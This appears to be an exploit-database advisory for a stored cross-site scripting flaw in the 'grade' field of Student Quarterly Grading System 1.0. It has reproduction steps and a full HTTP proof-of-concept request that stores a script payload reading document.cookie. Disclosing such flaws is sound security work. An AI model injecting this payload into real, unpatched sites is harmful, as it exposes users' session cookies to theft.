Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)

vendor:

Student Quarterly Grading System

by:

Hüseyin Serkan Balkanli

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Student Quarterly Grading System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:student_quarterly_grading_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Kali Linux

2021

Student Quarterly Grading System 1.0 – ‘grade’ Stored Cross-Site Scripting (XSS)

Student Quarterly Grading System v1.0 has Stored XSS at 'Add New Class' Function. An attacker can inject malicious JavaScript code into the 'grade' field of the 'Add New Class' form, which will be stored in the database and executed when the page is loaded by a victim.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database.

Source

Exploit-DB raw data:

# Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
# Date: 11.10.2021
# Exploit Author: Hüseyin Serkan Balkanli
# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Student Quarterly Grading System v1.0 has Stored XSS at "Add New Class" Function.

Steps To Reproduce:
1 - Click to Class from Menu and click "Add New".
2 - Enter the payload to "grade" field as "<script>alert(document.cookie);</script>" without double-quotes and choose one of the Subject from list. (It can be anything, doesn't matter.)
3 - Click on Save and you are done. It's gonna be triggered when anyone visits the application. It's global and can trigger on any page.

PoC

POST /grading_system/Actions.php?a=save_class HTTP/1.1
Host: localhost
Content-Length: 457
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO6Q8ADzs1UvBltkB
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/?page=class
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
Connection: close

------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="subject_id"

3
------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="grade"

<script>alert(document.cookie);</script>
------WebKitFormBoundaryO6Q8ADzs1UvBltkB
Content-Disposition: form-data; name="section"


------WebKitFormBoundaryO6Q8ADzs1UvBltkB--